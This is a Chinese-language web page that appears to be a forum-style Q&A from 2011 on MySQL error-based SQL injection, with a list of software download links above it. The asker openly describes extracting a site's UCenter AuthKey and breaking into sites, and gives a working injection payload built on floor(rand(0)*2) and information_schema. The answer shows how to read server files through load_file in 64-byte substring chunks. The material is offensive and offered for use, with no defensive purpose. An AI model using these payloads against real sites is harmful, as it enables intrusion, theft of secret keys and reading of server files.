- 1. DVDFab Passkey(輕松解決DVD受限制問題) V8.0.3.0 ...
- 2. UUSee網絡電視去廣告補丁(修正不能顯示播放列表問題...
- 3. MySQL(for Windows 32Bit)官方最新下載 V5.5.13
- 4. MySQL(for Windows 64Bit)最新官方下載 V5.5.13
- 5. UScreen(解決WIN7下游戲黑邊問題) V1.0.0.0
- 6. 迅游版迅雷網游加速器(解決網游中延時高、登錄難、...
- 7. phpMyAdmin(通過互聯網控制操作MYSQL的軟件) V3.4....
- 8. Access與MYSQL互轉 Access2MSSQL PRO v3.0.0 英文綠...
- 9. phpMyAdmin 3.4.0 RC2 多語綠色版_很方便的網絡遠M...
- 10. 旺財(有效解決開店貨源問題) V 1.31 簡體中文免費...
關于Mysql報錯注入的幾個問題
作者: 來源: 發布時間:2011-5-24 18:12:57 點擊:
No.1:Mysql報錯注入最多能夠顯示多少字節呢?我Inject到的UC的AuthKey爆出62位一共應該64位
No.2:爆出的用戶名中文和特殊符號顯示亂碼,用Hex()轉換了下爆出來再轉回去的時候依然亂碼,怎么解決?你知道國內很多SB愛用各種怪異的符號做用戶名,嚴重影響日站的進度。。
No.3:能否用報錯注入Load_File(),我沒有成功語句如下:
and (select 1 from(select count(*),concat((select (select load_file(0x.........)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
1. 64 位,但是許多報錯注入都會在前后加上特別符號,以方便分辨,如[],就變成62位了,可以使用substring來處理
2. 如圖:
3. 同樣使用substring 以64為1單位慢慢讀, 最好就是寫個循環來讀
Select concat(substring(load_file(0x....),1,64)) FROM uc_applications limit 0,1
Select concat(substring(load_file(0x....),65,64)) FROM uc_applications limit 0,1
Select concat(substring(load_file(0x....),129,64)) FROM uc_applications limit 0,1
上一篇:MySQL創建用戶及授權的簡單方法 下一篇: 教你解決關于XP共享拒絕訪問的問題
[收藏此文章]
